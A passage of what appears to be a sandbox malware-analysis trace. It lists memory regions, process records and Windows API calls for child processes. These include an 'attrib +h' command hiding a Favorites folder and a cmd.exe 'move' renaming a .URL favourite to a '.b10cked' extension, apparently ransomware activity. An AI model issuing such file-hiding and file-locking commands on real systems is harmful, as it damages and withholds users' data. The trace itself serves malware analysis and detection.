0x0 region_type = pagefile_backed name = "pagefile_0x0000000000010000" filename = "" Region: id = 31123 start_va = 0x20000 end_va = 0x2ffff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000020000" filename = "" Region: id = 31124 start_va = 0x50000 end_va = 0xb6fff entry_point = 0x50000 region_type = mapped_file name = "locale.nls" filename = "\\Windows\\System32\\locale.nls" (normalized: "c:\\windows\\system32\\locale.nls") Region: id = 31125 start_va = 0x1f0000 end_va = 0x1fffff entry_point = 0x0 region_type = private name = "private_0x00000000001f0000" filename = "" Region: id = 31126 start_va = 0x280000 end_va = 0x37ffff entry_point = 0x0 region_type = private name = "private_0x0000000000280000" filename = "" Region: id = 31127 start_va = 0x6dc20000 end_va = 0x6dc3cfff entry_point = 0x6dc20000 region_type = mapped_file name = "ulib.dll" filename = "\\Windows\\System32\\ulib.dll" (normalized: "c:\\windows\\system32\\ulib.dll") Region: id = 31128 start_va = 0x75540000 end_va = 0x75589fff entry_point = 0x75540000 region_type = mapped_file name = "kernelbase.dll" filename = "\\Windows\\System32\\KernelBase.dll" (normalized: "c:\\windows\\system32\\kernelbase.dll") Region: id = 31129 start_va = 0x75680000 end_va = 0x75720fff entry_point = 0x75680000 region_type = mapped_file name = "rpcrt4.dll" filename = "\\Windows\\System32\\rpcrt4.dll" (normalized: "c:\\windows\\system32\\rpcrt4.dll") Region: id = 31130 start_va = 0x76480000 end_va = 0x76489fff entry_point = 0x76480000 region_type = mapped_file name = "lpk.dll" filename = "\\Windows\\System32\\lpk.dll" (normalized: "c:\\windows\\system32\\lpk.dll") Region: id = 31131 start_va = 0x76910000 end_va = 0x769e3fff entry_point = 0x76910000 region_type = mapped_file name = "kernel32.dll" filename = "\\Windows\\System32\\kernel32.dll" (normalized: "c:\\windows\\system32\\kernel32.dll") Region: id = 31132 start_va = 0x769f0000 end_va = 0x76a8ffff entry_point = 0x769f0000 region_type = mapped_file name = "advapi32.dll" filename = "\\Windows\\System32\\advapi32.dll" (normalized: "c:\\windows\\system32\\advapi32.dll") Region: id = 31133 start_va = 0x76a90000 end_va = 0x76b3bfff entry_point = 0x76a90000 region_type = mapped_file name = "msvcrt.dll" filename = "\\Windows\\System32\\msvcrt.dll" (normalized: "c:\\windows\\system32\\msvcrt.dll") Region: id = 31134 start_va = 0x76b40000 end_va = 0x76c08fff entry_point = 0x76b40000 region_type = mapped_file name = "user32.dll" filename = "\\Windows\\System32\\user32.dll" (normalized: "c:\\windows\\system32\\user32.dll") Region: id = 31135 start_va = 0x76d70000 end_va = 0x76e0cfff entry_point = 0x76d70000 region_type = mapped_file name = "usp10.dll" filename = "\\Windows\\System32\\usp10.dll" (normalized: "c:\\windows\\system32\\usp10.dll") Region: id = 31136 start_va = 0x773c0000 end_va = 0x773d8fff entry_point = 0x773c0000 region_type = mapped_file name = "sechost.dll" filename = "\\Windows\\System32\\sechost.dll" (normalized: "c:\\windows\\system32\\sechost.dll") Region: id = 31137 start_va = 0x773e0000 end_va = 0x7742dfff entry_point = 0x773e0000 region_type = mapped_file name = "gdi32.dll" filename = "\\Windows\\System32\\gdi32.dll" (normalized: "c:\\windows\\system32\\gdi32.dll") Region: id = 31138 start_va = 0x7f6f0000 end_va = 0x7f7effff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x000000007f6f0000" filename = "" Region: id = 31139 start_va = 0x110000 end_va = 0x1d7fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000110000" filename = "" Region: id = 31140 start_va = 0x76490000 end_va = 0x764aefff entry_point = 0x76490000 region_type = mapped_file name = "imm32.dll" filename = "\\Windows\\System32\\imm32.dll" (normalized: "c:\\windows\\system32\\imm32.dll") Region: id = 31141 start_va = 0x76ca0000 end_va = 0x76d6bfff entry_point = 0x76ca0000 region_type = mapped_file name = "msctf.dll" filename = "\\Windows\\System32\\msctf.dll" (normalized: "c:\\windows\\system32\\msctf.dll") Thread: id = 717 os_tid = 0x5dc Process: id = "517" image_name = "attrib.exe" filename = "c:\\windows\\system32\\attrib.exe" page_root = "0x7ea16940" os_pid = "0x808" os_integrity_level = "0x3000" os_privileges = "0x60800000" monitor_reason = "child_process" parent_id = "512" os_parent_pid = "0x9ac" cmd_line = "attrib +h \"C:\\Users\\Default\\FAVORI~1\\Links\"" cur_dir = "C:\\Users\\EEBsYm5\\Desktop\\" os_username = "CRH2YWU7\\EEBsYm5" os_groups = "CRH2YWU7\\Domain Users" [0x7], "Everyone" [0x7], "BUILTIN\\Administrators" [0xf], "BUILTIN\\Users" [0x7], "NT AUTHORITY\\INTERACTIVE" [0x7], "CONSOLE LOGON" [0x7], "NT AUTHORITY\\Authenticated Users" [0x7], "NT AUTHORITY\\This Organization" [0x7], "NT AUTHORITY\\Logon Session 00000000:0000ea01" [0xc0000007], "LOCAL" [0x7], "NT AUTHORITY\\NTLM Authentication" [0x7] Region: id = 31142 start_va = 0x10000 end_va = 0x2ffff entry_point = 0x0 region_type = private name = "private_0x0000000000010000" filename = "" Region: id = 31143 start_va = 0x30000 end_va = 0x33fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000030000" filename = "" Region: id = 31144 start_va = 0x40000 end_va = 0x40fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000040000" filename = "" Region: id = 31145 start_va = 0x90000 end_va = 0xcffff entry_point = 0x0 region_type = private name = "private_0x0000000000090000" filename = "" Region: id = 31146 start_va = 0xf70000 end_va = 0xf76fff entry_point = 0xf70000 region_type = mapped_file name = "attrib.exe" filename = "\\Windows\\System32\\attrib.exe" (normalized: "c:\\windows\\system32\\attrib.exe") Region: id = 31147 start_va = 0x77230000 end_va = 0x7736bfff entry_point = 0x77230000 region_type = mapped_file name = "ntdll.dll" filename = "\\Windows\\System32\\ntdll.dll" (normalized: "c:\\windows\\system32\\ntdll.dll") Region: id = 31148 start_va = 0x77470000 end_va = 0x77470fff entry_point = 0x77470000 region_type = mapped_file name = "apisetschema.dll" filename = "\\Windows\\System32\\apisetschema.dll" (normalized: "c:\\windows\\system32\\apisetschema.dll") Region: id = 31149 start_va = 0x7ffb0000 end_va = 0x7ffd2fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x000000007ffb0000" filename = "" Region: id = 31150 start_va = 0x7ffd7000 end_va = 0x7ffd7fff entry_point = 0x0 region_type = private name = "private_0x000000007ffd7000" filename = "" Region: id = 31151 start_va = 0x7ffdf000 end_va = 0x7ffdffff entry_point = 0x0 region_type = private name = "private_0x000000007ffdf000" filename = "" Region: id = 31152 start_va = 0x10000 end_va = 0x1ffff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000010000" filename = "" Region: id = 31153 start_va = 0x20000 end_va = 0x2ffff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000020000" filename = "" Region: id = 31154 start_va = 0xd0000 end_va = 0x136fff entry_point = 0xd0000 region_type = mapped_file name = "locale.nls" filename = "\\Windows\\System32\\locale.nls" (normalized: "c:\\windows\\system32\\locale.nls") Region: id = 31155 start_va = 0x240000 end_va = 0x24ffff entry_point = 0x0 region_type = private name = "private_0x0000000000240000" filename = "" Region: id = 31156 start_va = 0x2c0000 end_va = 0x3bffff entry_point = 0x0 region_type = private name = "private_0x00000000002c0000" filename = "" Region: id = 31157 start_va = 0x6dc00000 end_va = 0x6dc1cfff entry_point = 0x6dc00000 region_type = mapped_file name = "ulib.dll" filename = "\\Windows\\System32\\ulib.dll" (normalized: "c:\\windows\\system32\\ulib.dll") Region: id = 31158 start_va = 0x75540000 end_va = 0x75589fff entry_point = 0x75540000 region_type = mapped_file name = "kernelbase.dll" filename = "\\Windows\\System32\\KernelBase.dll" (normalized: "c:\\windows\\system32\\kernelbase.dll") Region: id = 31159 start_va = 0x75680000 end_va = 0x75720fff entry_point = 0x75680000 region_type = mapped_file name = "rpcrt4.dll" filename = "\\Windows\\System32\\rpcrt4.dll" (normalized: "c:\\windows\\system32\\rpcrt4.dll") Region: id = 31160 start_va = 0x76480000 end_va = 0x76489fff entry_point = 0x76480000 region_type = mapped_file name = "lpk.dll" filename = "\\Windows\\System32\\lpk.dll" (normalized: "c:\\windows\\system32\\lpk.dll") Region: id = 31161 start_va = 0x76910000 end_va = 0x769e3fff entry_point = 0x76910000 region_type = mapped_file name = "kernel32.dll" filename = "\\Windows\\System32\\kernel32.dll" (normalized: "c:\\windows\\system32\\kernel32.dll") Region: id = 31162 start_va = 0x769f0000 end_va = 0x76a8ffff entry_point = 0x769f0000 region_type = mapped_file name = "advapi32.dll" filename = "\\Windows\\System32\\advapi32.dll" (normalized: "c:\\windows\\system32\\advapi32.dll") Region: id = 31163 start_va = 0x76a90000 end_va = 0x76b3bfff entry_point = 0x76a90000 region_type = mapped_file name = "msvcrt.dll" filename = "\\Windows\\System32\\msvcrt.dll" (normalized: "c:\\windows\\system32\\msvcrt.dll") Region: id = 31164 start_va = 0x76b40000 end_va = 0x76c08fff entry_point = 0x76b40000 region_type = mapped_file name = "user32.dll" filename = "\\Windows\\System32\\user32.dll" (normalized: "c:\\windows\\system32\\user32.dll") Region: id = 31165 start_va = 0x76d70000 end_va = 0x76e0cfff entry_point = 0x76d70000 region_type = mapped_file name = "usp10.dll" filename = "\\Windows\\System32\\usp10.dll" (normalized: "c:\\windows\\system32\\usp10.dll") Region: id = 31166 start_va = 0x773c0000 end_va = 0x773d8fff entry_point = 0x773c0000 region_type = mapped_file name = "sechost.dll" filename = "\\Windows\\System32\\sechost.dll" (normalized: "c:\\windows\\system32\\sechost.dll") Region: id = 31167 start_va = 0x773e0000 end_va = 0x7742dfff entry_point = 0x773e0000 region_type = mapped_file name = "gdi32.dll" filename = "\\Windows\\System32\\gdi32.dll" (normalized: "c:\\windows\\system32\\gdi32.dll") Region: id = 31168 start_va = 0x7f6f0000 end_va = 0x7f7effff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x000000007f6f0000" filename = "" Region: id = 31169 start_va = 0x140000 end_va = 0x207fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000140000" filename = "" Region: id = 31170 start_va = 0x76490000 end_va = 0x764aefff entry_point = 0x76490000 region_type = mapped_file name = "imm32.dll" filename = "\\Windows\\System32\\imm32.dll" (normalized: "c:\\windows\\system32\\imm32.dll") Region: id = 31171 start_va = 0x76ca0000 end_va = 0x76d6bfff entry_point = 0x76ca0000 region_type = mapped_file name = "msctf.dll" filename = "\\Windows\\System32\\msctf.dll" (normalized: "c:\\windows\\system32\\msctf.dll") Thread: id = 718 os_tid = 0x7d0 Process: id = "518" image_name = "cmd.exe" filename = "c:\\windows\\system32\\cmd.exe" page_root = "0x7ea16b40" os_pid = "0x9cc" os_integrity_level = "0x3000" os_privileges = "0x60800000" monitor_reason = "child_process" parent_id = "9" os_parent_pid = "0xaec" cmd_line = "\"C:\\Windows\\system32\\cmd.exe\" /C move /Y \"C:\\Users\\Default\\FAVORI~1\\MICROS~1\\IEADD-~1.URL\" \"C:\\Users\\Default\\FAVORI~1\\MICROS~1\\IE Add-on site.url.b10cked\"" cur_dir = "C:\\Users\\EEBsYm5\\Desktop\\" os_username = "CRH2YWU7\\EEBsYm5" os_groups = "CRH2YWU7\\Domain Users" [0x7], "Everyone" [0x7], "BUILTIN\\Administrators" [0xf], "BUILTIN\\Users" [0x7], "NT AUTHORITY\\INTERACTIVE" [0x7], "CONSOLE LOGON" [0x7], "NT AUTHORITY\\Authenticated Users" [0x7], "NT AUTHORITY\\This Organization" [0x7], "NT AUTHORITY\\Logon Session 00000000:0000ea01" [0xc0000007], "LOCAL" [0x7], "NT AUTHORITY\\NTLM Authentication" [0x7] Region: id = 31184 start_va = 0x10000 end_va = 0x2ffff entry_point = 0x0 region_type = private name = "private_0x0000000000010000" filename = "" Region: id = 31185 start_va = 0x30000 end_va = 0x33fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000030000" filename = "" Region: id = 31186 start_va = 0x40000 end_va = 0x40fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000040000" filename = "" Region: id = 31187 start_va = 0x110000 end_va = 0x20ffff entry_point = 0x0 region_type = private name = "private_0x0000000000110000" filename = "" Region: id = 31188 start_va = 0x4a9c0000 end_va = 0x4aa0bfff entry_point = 0x4a9c0000 region_type = mapped_file name = "cmd.exe" filename = "\\Windows\\System32\\cmd.exe" (normalized: "c:\\windows\\system32\\cmd.exe") Region: id = 31189 start_va = 0x77230000 end_va = 0x7736bfff entry_point = 0x77230000 region_type = mapped_file name = "ntdll.dll" filename = "\\Windows\\System32\\ntdll.dll" (normalized: "c:\\windows\\system32\\ntdll.dll") Region: id = 31190 start_va = 0x77470000 end_va = 0x77470fff entry_point = 0x77470000 region_type = mapped_file name = "apisetschema.dll" filename = "\\Windows\\System32\\apisetschema.dll" (normalized: "c:\\windows\\system32\\apisetschema.dll") Region: id = 31191 start_va = 0x7ffb0000 end_va = 0x7ffd2fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x000000007ffb0000" filename = "" Region: id = 31192 start_va = 0x7ffd9000 end_va = 0x7ffd9fff entry_point = 0x0 region_type = private name = "private_0x000000007ffd9000" filename = "" Region: id = 31193 start_va = 0x7ffdf000 end_va = 0x7ffdffff entry_point = 0x0 region_type = private name = "private_0x000000007ffdf000" filename = "" Region: id = 31238 start_va = 0x10000 end_va = 0x1ffff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000010000" filename = "" Region: id = 31239 start_va = 0x20000 end_va = 0x2ffff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000020000" filename = "" Region: id = 31240 start_va = 0x50000 end_va = 0xb6fff entry_point = 0x50000 region_type = mapped_file name = "locale.nls" filename = "\\Windows\\System32\\locale.nls" (normalized: "c:\\windows\\system32\\locale.nls") Region: id = 31241 start_va = 0x320000 end_va = 0x32ffff entry_point = 0x0 region_type = private name = "private_0x0000000000320000" filename = "" Region: id = 31242 start_va = 0x3d0000 end_va = 0x4cffff entry_point = 0x0 region_type = private name = "private_0x00000000003d0000" filename = "" Region: id = 31243 start_va = 0x6ee80000 end_va = 0x6ee86fff entry_point = 0x6ee80000 region_type = mapped_file name = "winbrand.dll" filename = "\\Windows\\System32\\winbrand.dll" (normalized: "c:\\windows\\system32\\winbrand.dll") Region: id = 31244 start_va = 0x75540000 end_va = 0x75589fff entry_point = 0x75540000 region_type = mapped_file name = "kernelbase.dll" filename = "\\Windows\\System32\\KernelBase.dll" (normalized: "c:\\windows\\system32\\kernelbase.dll") Region: id = 31245 start_va = 0x76480000 end_va = 0x76489fff entry_point = 0x76480000 region_type = mapped_file name = "lpk.dll" filename = "\\Windows\\System32\\lpk.dll" (normalized: "c:\\windows\\system32\\lpk.dll") Region: id = 31246 start_va = 0x76910000 end_va = 0x769e3fff entry_point = 0x76910000 region_type = mapped_file name = "kernel32.dll" filename = "\\Windows\\System32\\kernel32.dll" (normalized: "c:\\windows\\system32\\kernel32.dll") Region: id = 31247 start_va = 0x76a90000 end_va = 0x76b3bfff entry_point = 0x76a90000 region_type = mapped_file name = "msvcrt.dll" filename = "\\Windows\\System32\\msvcrt.dll" (normalized: "c:\\windows\\system32\\msvcrt.dll") Region: id = 31248 start_va = 0x76b40000 end_va = 0x76c08fff entry_point = 0x76b40000 region_type = mapped_file name = "user32.dll" filename = "\\Windows\\System32\\user32.dll" (normalized: "c:\\windows\\system32\\user32.dll") Region: id = 31249 start_va = 0x76d70000 end_va = 0x76e0cfff entry_point = 0x76d70000 region_type = mapped_file name = "usp10.dll" filename = "\\Windows\\System32\\usp10.dll" (normalized: "c:\\windows\\system32\\usp10.dll") Region: id = 31250 start_va = 0x773e0000 end_va = 0x7742dfff entry_point = 0x773e0000 region_type = mapped_file name = "gdi32.dll" filename = "\\Windows\\System32\\gdi32.dll" (normalized: "c:\\windows\\system32\\gdi32.dll") Region: id = 31251 start_va = 0x7f6f0000 end_va = 0x7f7effff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x000000007f6f0000" filename = "" Region: id = 31252 start_va = 0x210000 end_va = 0x2d7fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000210000" filename = "" Region: id = 31253 start_va = 0x76490000 end_va = 0x764aefff entry_point = 0x76490000 region_type = mapped_file name = "imm32.dll" filename = "\\Windows\\System32\\imm32.dll" (normalized: "c:\\windows\\system32\\imm32.dll") Region: id = 31254 start_va = 0x76ca0000 end_va = 0x76d6bfff entry_point = 0x76ca0000 region_type = mapped_file name = "msctf.dll" filename = "\\Windows\\System32\\msctf.dll" (normalized: "c:\\windows\\system32\\msctf.dll") Region: id = 31255 start_va = 0xc0000 end_va = 0xc6fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000000c0000" filename = "" Region: id = 31256 start_va = 0xd0000 end_va = 0xd1fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000000d0000" filename = "" Region: id = 31257 start_va = 0xe0000 end_va = 0xe0fff entry_point = 0x0 region_type = private name = "private_0x00000000000e0000" filename = "" Region: id = 31258 start_va = 0xf0000 end_va = 0xf0fff entry_point = 0x0 region_type = private name = "private_0x00000000000f0000" filename = "" Region: id = 31259 start_va = 0x4d0000 end_va = 0x5d0fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000004d0000" filename = "" Region: id = 31260 start_va = 0x5e0000 end_va = 0x11dffff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000005e0000" filename = "" Region: id = 31261 start_va = 0x11e0000 end_va = 0x1342fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000011e0000" filename = "" Thread: id = 719 os_tid = 0xab8 [0212.079] GetSystemTimeAsFileTime (in: lpSystemTimeAsFileTime=0x20f844 | out: lpSystemTimeAsFileTime=0x20f844*(dwLowDateTime=0xb338c5c0, dwHighDateTime=0x1d440a9)) [0212.079] GetCurrentProcessId () returned 0x9cc [0212.079] GetCurrentThreadId () returned 0xab8 [0212.079] GetTickCount () returned 0x3b7c9 [0212.079] QueryPerformanceCounter (in: lpPerformanceCount=0x20f83c | out: lpPerformanceCount=0x20f83c*=26886796852) returned 1 [0212.079] GetModuleHandleA (lpModuleName=0x0) returned 0x4a9c0000 [0212.079] __set_app_type (_Type=0x1) [0212.079] __p__fmode () returned 0x76b331f4 [0212.079] __p__commode () returned 0x76b331fc [0212.080] SetUnhandledExceptionFilter (lpTopLevelExceptionFilter=0x4a9e21a6) returned 0x0 [0212.080] __getmainargs (in: _Argc=0x4a9e4238, _Argv=0x4a9e4240, _Env=0x4a9e423c, _DoWildCard=0, _StartInfo=0x4a9e4140 | out: _Argc=0x4a9e4238, _Argv=0x4a9e4240, _Env=0x4a9e423c) returned 0 [0212.080] GetCurrentThreadId () returned 0xab8 [0212.080] OpenThread (dwDesiredAccess=0x1fffff, bInheritHandle=0, dwThreadId=0xab8) returned 0x38 [0212.080] GetModuleHandleW (lpModuleName="KERNEL32.DLL") returned 0x76910000 [0212.080] GetProcAddress (hModule=0x76910000, lpProcName="SetThreadUILanguage") returned 0x769624c2 [0212.080] SetThreadUILanguage (LangId=0x0) returned 0x409 [0212.080] HeapSetInformation (HeapHandle=0x0, HeapInformationClass=0x1, HeapInformation=0x0, HeapInformationLength=0x0) returned 1 [0212.080] RegOpenKeyExW (in: hKey=0x80000001, lpSubKey="Software\\Policies\\Microsoft\\Windows\\System", ulOptions=0x0, samDesired=0x20019, phkResult=0x20f7d4 | out: phkResult=0x20f7d4*=0x0) returned 0x2 [0212.080] VirtualQuery (in: lpAddress=0x20f80b, lpBuffer=0x20f7a4, dwLength=0x1c | out: lpBuffer=0x20f7a4*(BaseAddress=0x20f000, AllocationBase=0x110000, AllocationProtect=0x4, RegionSize=0x1000, State=0x1000, Protect=0x4, Type=0x20000)) returned 0x1c [0212.080] VirtualQuery (in: lpAddress=0x110000, lpBuffer=0x20f7a4, dwLength=0x1c | out: lpBuffer=0x20f7a4*(BaseAddress=0x110000, AllocationBase=0x110000, AllocationProtect=0x4, RegionSize=0x1000, State=0x2000, Protect=0x0, Type=0x20000)) returned 0x1c [0212.080] VirtualQuery (in: lpAddress=0x111000, lpBuffer=0x20f7a4, dwLength=0x1c | out: lpBuffer=0x20f7a4*(BaseAddress=0x111000, AllocationBase=0x110000, AllocationProtect=0x4, RegionSize=0x2000, State=0x1000, Protect=0x104, Type=0x20000)) returned 0x1c [0212.080] VirtualQuery (in: lpAddress=0x113000, lpBuffer=0x20f7a4, dwLength=0x1c | out: lpBuffer=0x20f7a4*(BaseAddress=0x113000, AllocationBase=0x110000, AllocationProtect=0x4, RegionSize=0xfd000, State=0x1000, Protect=0x4, Type=0x20000)) returned 0x1c [0212.080] VirtualQuery (in: lpAddress=0x210000, lpBuffer=0x20f7a4, dwLength=0x1c | out: lpBuffer=0x20f7a4*(BaseAddress=0x210000, AllocationBase=0x210000, AllocationProtect=0x2, RegionSize=0x2000, State=0x1000, Protect=0x2, Type=0x40000)) returned 0x1c [0212.080] GetConsoleOutputCP () returned 0x1b5 [0212.080] GetCPInfo (in: CodePage=0x1b5, lpCPInfo=0x4a9e4260 | out: lpCPInfo=0x4a9e4260) returned 1 [0212.081] SetConsoleCtrlHandler (HandlerRoutine=0x4a9de72a, Add=1) returned 1 [0212.081] _get_osfhandle (_FileHandle=1) returned 0x7 [0212.081] SetConsoleMode (hConsoleHandle=0x7, dwMode=0x0) returned 1 [0212.081] _get_osfhandle (_FileHandle=1) returned 0x7 [0212.081] GetConsoleMode (in: hConsoleHandle=0x7, lpMode=0x4a9e41ac | out: lpMode=0x4a9e41ac) returned 1 [0212.081] _get_osfhandle (_FileHandle=1) returned 0x7 [0212.081] SetConsoleMode (hConsoleHandle=0x7, dwMode=0x3) returned 1 [0212.081] _get_osfhandle (_FileHandle=0) returned 0x3 [0212.081] GetConsoleMode (in: hConsoleHandle=0x3, lpMode=0x4a9e41b0 | out: lpMode=0x4a9e41b0) returned 1 [0212.081] _get_osfhandle (_FileHandle=0) returned 0x3 [0212.081] SetConsoleMode (hConsoleHandle=0x3, dwMode=0x1a7) returned 1 [0212.081] GetEnvironmentStringsW () returned 0x3e01a8* [0212.082] FreeEnvironmentStringsW (penv=0x3e01a8) returned 1 [0212.082] GetEnvironmentStringsW () returned 0x3e01a8* [0212.082] FreeEnvironmentStringsW (penv=0x3e01a8) returned 1 [0212.082] RegOpenKeyExW (in: hKey=0x80000002, lpSubKey="Software\\Microsoft\\Command Processor", ulOptions=0x0, samDesired=0x2000000, phkResult=0x20e744 | out: phkResult=0x20e744*=0x40) returned 0x0 [0212.082] RegQueryValueExW (in: hKey=0x40, lpValueName="DisableUNCCheck", lpReserved=0x0, lpType=0x20e74c, lpData=0x20e750, lpcbData=0x20e748*=0x1000 | out: lpType=0x20e74c*=0x0, lpData=0x20e750*=0xd0, lpcbData=0x20e748*=0x1000) returned 0x2 [0212.082] RegQueryValueExW (in: hKey=0x40, lpValueName="EnableExtensions", lpReserved=0x0, lpType=0x20e74c, lpData=0x20e750, lpcbData=0x20e748*=0x1000 | out: lpType=0x20e74c*=0x4, lpData=0x20e750*=0x1, lpcbData=0x20e748*=0x4) returned 0x0 [0212.082] RegQueryValueExW (in: hKey=0x40, lpValueName="DelayedExpansion", lpReserved=0x0, lpType=0x20e74c, lpData=0x20e750, lpcbData=0x20e748*=0x1000 | out: lpType=0x20e74c*=0x0, lpData=0x20e750*=0x1, lpcbData=0x20e748*=0x1000) returned 0x2 [0212.082] RegQueryValueExW (in: hKey=0x40, lpValueName="DefaultColor", lpReserved=0x0, lpType=0x20e74c, lpData=0x20e750, lpcbData=0x20e748*=0x1000 | out: lpType=0x20e74c*=0x4, lpData=0x20e750*=0x0, lpcbData=0x20e748*=0x4) returned 0x0 [0212.082] RegQueryValueExW (in: hKey=0x40, lpValueName="CompletionChar", lpReserved=0x0, lpType=0x20e74c, lpData=0x20e750, lpcbData=0x20e748*=0x1000 | out: lpType=0x20e74c*=0x4, lpData=0x20e750*=0x40, lpcbData=0x20e748*=0x4) returned 0x0 [0212.082] RegQueryValueExW (in: hKey=0x40, lpValueName="PathCompletionChar", lpReserved=0x0, lpType=0x20e74c, lpData=0x20e750, lpcbData=0x20e748*=0x1000 | out: lpType=0x20e74c*=0x4, lpData=0x20e750*=0x40, lpcbData=0x20e748*=0x4) returned 0x0 [0212.082] RegQueryValueExW (in: hKey=0x40, lpValueName="AutoRun", lpReserved=0x0, lpType=0x20e74c, lpData=0x20e750, lpcbData=0x20e748*=0x1000 | out: lpType=0x20e74c*=0x0, lpData=0x20e750*=0x40, lpcbData=0x20e748*=0x1000) returned 0x2 [0212.082] RegCloseKey (hKey=0x40) returned 0x0 [0212.082] RegOpenKeyExW (in: hKey=0x80000001, lpSubKey="Software\\Microsoft\\Command Processor", ulOptions=0x0, samDesired=0x2000000, phkResult=0x20e744 | out: phkResult=0x20e744*=0x40) returned 0x0 [0212.082] RegQueryValueExW (in: hKey=0x40, lpValueName="DisableUNCCheck", lpReserved=0x0, lpType=0x20e74c, lpData=0x20e750, lpcbData=0x20e748*=0x1000 | out: lpType=0x20e74c*=0x0, lpData=0x20e750*=0x40, lpcbData=0x20e748*=0x1000) returned 0x2 [0212.082] RegQueryValueExW (in: hKey=0x40, lpValueName="EnableExtensions", lpReserved=0x0, lpType=0x20e74c, lpData=0x20e750, lpcbData=0x20e748*=0x1000 | out: lpType=0x20e74c*=0x4, lpData=0x20e750*=0x1, lpcbData=0x20e748*=0x4) returned 0x0 [0212.083] RegQueryValueExW (in: hKey=0x40, lpValueName="DelayedExpansion", lpReserved=0x0, lpType=0x20e74c, lpData=0x20e750, lpcbData=0x20e748*=0x1000 | out: lpType=0x20e74c*=0x0, lpData=0x20e750*=0x1, lpcbData=0x20e748*=0x1000) returned 0x2 [0212.083] RegQueryValueExW (in: hKey=0x40, lpValueName="DefaultColor", lpReserved=0x0, lpType=0x20e74c, lpData=0x20e750, lpcbData=0x20e748*=0x1000 | out: lpType=0x20e74c*=0x4, lpData=0x20e750*=0x0, lpcbData=0x20e748*=0x4) returned 0x0 [0212.083] RegQueryValueExW (in: hKey=0x40, lpValueName="CompletionChar", lpReserved=0x0, lpType=0x20e74c, lpData=0x20e750, lpcbData=0x20e748*=0x1000 | out: lpType=0x20e74c*=0x4, lpData=0x20e750*=0x9, lpcbData=0x20e748*=0x4) returned 0x0 [0212.083] RegQueryValueExW (in: hKey=0x40, lpValueName="PathCompletionChar", lpReserved=0x0, lpType=0x20e74c, lpData=0x20e750, lpcbData=0x20e748*=0x1000 | out: lpType=0x20e74c*=0x4, lpData=0x20e750*=0x9, lpcbData=0x20e748*=0x4) returned 0x0 [0212.083] RegQueryValueExW (in: hKey=0x40, lpValueName="AutoRun", lpReserved=0x0, lpType=0x20e74c, lpData=0x20e750, lpcbData=0x20e748*=0x1000 | out: lpType=0x20e74c*=0x0, lpData=0x20e750*=0x9, lpcbData=0x20e748*=0x1000) returned 0x2 [0212.083] RegCloseKey (hKey=0x40) returned 0x0 [0212.083] time (in: timer=0x0 | out: timer=0x0) returned 0x5b8863ae [0212.083] srand (_Seed=0x5b8863ae) [0212.083] GetCommandLineW () returned="\"C:\\Windows\\system32\\cmd.exe\" /C move /Y \"C:\\Users\\Default\\FAVORI~1\\MICROS~1\\IEADD-~1.URL\" \"C:\\Users\\Default\\FAVORI~1\\MICROS~1\\IE Add-on site.url.b10cked\"" [0212.083] GetCommandLineW () returned="\"C:\\Windows\\system32\\cmd.exe\" /C move /Y \"C:\\Users\\Default\\FAVORI~1\\MICROS~1\\IEADD-~1.URL\" \"C:\\Users\\Default\\FAVORI~1\\MICROS~1\\IE Add-on site.url.b10cked\"" [0212.084] GetCurrentDirectoryW (in: nBufferLength=0x104, lpBuffer=0x4a9e5260 | out: lpBuffer="C:\\Users\\EEBsYm5\\Desktop") returned 0x18 [0212.084] GetModuleFileNameW (in: hModule=0x0, lpFilename=0x3e1908, nSize=0x104 | out: lpFilename="C:\\Windows\\system32\\cmd.exe" (normalized: "c:\\windows\\system32\\cmd.exe")) returned 0x1b [0212.085] GetEnvironmentVariableW (in: lpName="PATH", lpBuffer=0x4a9f0640, nSize=0x2000 | out: lpBuffer="C:\\Windows\\system32;C:\\Windows;C:\\Windows\\System32\\Wbem;C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\") returned 0x63 [0212.085] GetEnvironmentVariableW (in: lpName="PATHEXT", lpBuffer=0x4a9f0640, nSize=0x2000 | out: lpBuffer=".COM;.EXE;.BAT;.CMD;.VBS;.VBE;.JS;.JSE;.WSF;.WSH;.MSC") returned 0x35 [0212.085] GetEnvironmentVariableW (in: lpName="PROMPT", lpBuffer=0x4a9f0640, nSize=0x2000 | out: lpBuffer="") returned 0x0 [0212.085] _wcsicmp (_String1="PROMPT", _String2="CD") returned 13 [0212.085] _wcsicmp (_String1="PROMPT", _String2="ERRORLEVEL") returned 11 [0212.085] _wcsicmp (_String1="PROMPT", _String2="CMDEXTVERSION") returned 13 [0212.085] _wcsicmp (_String1="PROMPT", _String2="CMDCMDLINE") returned 13 [0212.085] _wcsicmp (_String1="PROMPT", _String2="DATE") returned 12 [0212.085] _wcsicmp (_String1="PROMPT", _String2="TIME") returned -4 [0212.085] _wcsicmp (_String1="PROMPT", _String2="RANDOM") returned -2 [0212.085] _wcsicmp (_String1="PROMPT", _String2="HIGHESTNUMANODENUMBER") returned 8 [0212.085] SetEnvironmentVariableW (lpName="PROMPT", lpValue="$P$G") returned 1 [0212.085] GetEnvironmentStringsW () returned 0x3e22f8* [0212.086] FreeEnvironmentStringsW (penv=0x3e22f8) returned 1 [0212.086] GetEnvironmentVariableW (in: lpName="COMSPEC", 